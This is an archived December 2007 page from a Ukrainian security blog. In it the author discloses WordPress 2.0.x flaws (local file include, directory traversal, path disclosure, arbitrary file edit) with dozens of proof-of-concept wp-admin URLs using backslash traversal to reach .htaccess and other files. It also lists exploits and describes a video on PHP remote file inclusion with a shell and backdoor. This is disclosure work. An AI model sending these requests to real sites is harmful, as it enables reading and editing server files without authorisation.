Архів за Грудень, 2007

З Новим Роком!

23:51 31.12.2007

Поздоровляю усіх вас з Новим Роком!

Бажаю в наступному 2008 році більше безпеки вам і вашим сайтам.

В якості подарунку на вас чекає святкова уразливість ;-) . А також уразливості в WordPress, що були оприлюднені мною в День багів в WordPress.

Веселих свят! :cool:

Святкова уразливість на jokesland.net.ru

22:47 31.12.2007

В зв’язку з Новим Роком, що скоро наступить, пропоную вам два цікавих поздоровлення в якості невеличкого подарунку ;-) .

Поздоровлення №1

Поздоровлення №2

А також повідомляю, що 25.12.2007, я знайшов Cross-Site Scripting уразливість на проекті jokesland.net.ru. Тому самому, де і знаходиться це веселе новорічне поздоровлення :-) .

XSS:

500000 flash файлів на популярних сайтах уразливі до XSS

19:39 31.12.2007

Експерти безпеки Google попереджають про небезпечні уразливості в безпеці flash-аплетів. Вони стверджують, що в рамках спільного зі співробітниками фірми iSEC розслідування виявили, що більш ніж 500000 flash-файлів, розміщених на популярних веб-сайтах, відкриті для атак за допомогою міжсайтового скриптінга (XSS). Дослідники говорять, що навіть останні оновлення безпеки Adobe Flash Player не забезпечують захисту від небезпек, що були виявлені. Серед іншого, вони знайшли небезпечні flash-файли на державних онлайн-ресурсах і сайтах банків.

Група опублікувала подробиці дослідження в книзі “Hacking Exposed Web 2.0″, що вийде в США в січні 2008 р. Подібні повідомлення ІБ-компаній з’являються досить часто. Adobe, як стверджується, була інформована про результати досліджень ще у влітку 2007 р.

Автори стверджують, що секюріті патчі для flash-клієнта не можуть забезпечити вирішення даної проблеми: шкідливий код генерується вже при створенні файлів у багатьох популярних пакетах, у тому числі DreamWeaver, Breeze і Camtasia. Уразливості flash дозволяють зчитувати cookies чи реєстраційні дані, що можуть використовуватися в злочинних цілях.

По матеріалам http://www.secblog.info.

Добірка уразливостей

16:52 31.12.2007

В даній добірці уразливості в веб додатках:

  • Vulnerability in Joomla! (деталі)
  • Cross-site scripting (XSS) vulnerability in cPanel WebHost Manager (деталі)
  • Apple Safari on MacOSX may reveal user’s saved passwords (деталі)
  • safari’s saved password at risk (деталі)
  • Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability (деталі)
  • CodeAvalanche News SQL Injection (деталі)
  • nabopoll 1.2 Remote Unprotected Admin Section Vulnerability (деталі)
  • Переповнення буфера в AT-TFTP Server (деталі)
  • Vulnerability in Sun Java Development Kit (JDK), Java Runtime Environment (JRE) and Java System Development Kit (SDK) (деталі)
  • New squirrelmail packages fix cross-site scripting (деталі)
  • Міжсайтовий скриптінг в iNews Publisher (деталі)
  • Міжсайтовий скриптінг в mmgallery (деталі)
  • PHP remote file inclusion vulnerability in cwmCounter (деталі)
  • PHP remote file inclusion vulnerability in Paristemi 0.8.3 (деталі)
  • SQL-ін’єкція в Basic Forum (деталі)

Local file include, Directory traversal та Full path disclosure в WordPress

23:43 30.12.2007

Продовжу оприлюднювати численні уразливості в WP в День багів в WordPress. Про деякі подібні уразливості я писав раніше.

В грудні, 22.12.2007, я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах index.php, link-manager.php, link-add.php, link-categories.php, link-import.php, theme-editor.php, plugins.php, plugin-editor.php, profile.php, users.php, options-general.php, options-writing.php, options-reading.php, options-discussion.php, options-permalink.php, options-misc.php, import.php, admin.php, bookmarklet.php, cat-js.php, inline-uploading.php, options.php, profile-update.php, sidebar.php, user-edit.php (в параметрі page), а також в файлах admin-footer.php, admin-functions.php, edit-form.php, edit-form-advanced.php, edit-form-comment.php, edit-link-form.php, edit-page-form.php, menu.php, menu-header.php, blogger.php, dotclear.php, greymatter.php, livejournal.php, mt.php, rss.php, textpattern.php.

Full path disclosure:

http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Local file include та Directory traversal:

http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Arbitrary file edit, Local file include, Directory traversal та Full path disclosure в WordPress

22:52 30.12.2007

Сьогодні, в День багів в WordPress, я оприлюднюю численні уразливості в WP. Про деякі подібні уразливості я писав раніше.

В грудні, 02.12.2007 (в templates.php) і 22.12.2007, я знайшов Arbitrary file edit, Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлі templates.php (в параметрах file та page) та файлах edit-pages.php, categories.php, edit-comments.php, moderation.php, post.php та page-new.php (в параметрі page).

Full path disclosure:

http://site/wp-admin/templates.php?file= (працює тільки в WP 2.0.11)
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

Local file include та Directory traversal:

http://site/wp-admin/templates.php?page=\..\..\file.php
http://site/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

День багів в WordPress

20:47 30.12.2007

В цьому місяці я багато писав про уразливості в WordPress. Як про уразливості, що були виявлені в Вордпресі різними секюріті дослідниками, так і про уразливості знайдені мною в движку в цьому році. А також оприлюднив уразливості в одному плагіні для WP.

І сьогодні я вирішив провести новий цікавий проект - День багів в WordPress (Day of bugs in WordPress). Сьогодні я опублікую ще чималу кількість уразливостей, котрі я знайшов в WP в цьому році.

Серед виявлених мною уразливостей в движку, що я вже оприлюднив в грудні, були наступні:

  • Information disclosure уразливості в WordPress (деталі)
  • XSS уразливості в WordPress 2.0.x (деталі)
  • Cross-Site Scripting в WordPress 2.0.x (деталі)
  • XSS уразливості в WordPress 2.0.x (деталі)
  • Directory traversal, Arbitrary file deletion, DoS та XSS в WordPress (деталі)
  • Local file include, Directory traversal та Full path disclosure в WordPress (деталі)
  • Нові Local file include, Directory traversal та Full path disclosure в WordPress (деталі)

Добірка експлоітів

18:35 30.12.2007

В даній добірці експлоіти в веб додатках:

  • VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion Vulnerability (деталі)
  • DL PayCart 1.01 (viewitem.php ItemID) Blind SQL Injection Exploit (деталі)
  • Pakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability (деталі)
  • phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities (деталі)
  • Ourspace 2.0.9 (uploadmedia.cgi) Remote File Upload Vulnerability (деталі)
  • NMDeluxe 2.0.0 (id) Remote SQL Injection Vulnerability (деталі)
  • phpBB Links MOD 1.2.2 Remote SQL Injection Exploit (деталі)
  • CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit (деталі)
  • Joomla! 1.5 Beta1/Beta2/RC1 Remote SQL Injection Exploit (деталі)
  • AJDating 1.0 (view_profile.php) Remote BLIND SQL Injection Exploit (деталі)

Нові Local file include, Directory traversal та Full path disclosure в WordPress

23:54 29.12.2007

В жовтні, 31.10.2007 (в edit.php), і в листопаді, 29.11.2007 (в admin.php), я знайшов нові Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах edit.php та admin.php в параметрі page.

Full path disclosure:

http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/edit.php?page=\..\..\file.php
http://site/wp-admin/edit.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\file.php
http://site/wp-admin/admin.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Відео про PHP Remote File Inclusion

22:49 29.12.2007

Продовжуючи розпочату традицію, після попереднього відео про пошук уразливостей в веб додатках, пропоную новий відео секюріті мануал. Цього разу відео про PHP Remote File Inclusion атаку. Рекомендую подивитися всім хто цікавиться цією темою.

PHP Remote File Inclusion / Windows Backdoor

В даному відео ролику розповідається про використання PHP Remote File Inclusion уразливостей на прикладі одного веб сайта. Причому окрім використання RFI для створення PHP-шелу, хакер відкриває порт на сервері та створює на ньому бекдор. Рекомендую подивитися дане відео для розуміння векторів атаки за допомогою PHP Remote File Inclusion та небезпеки подібних уразливостей.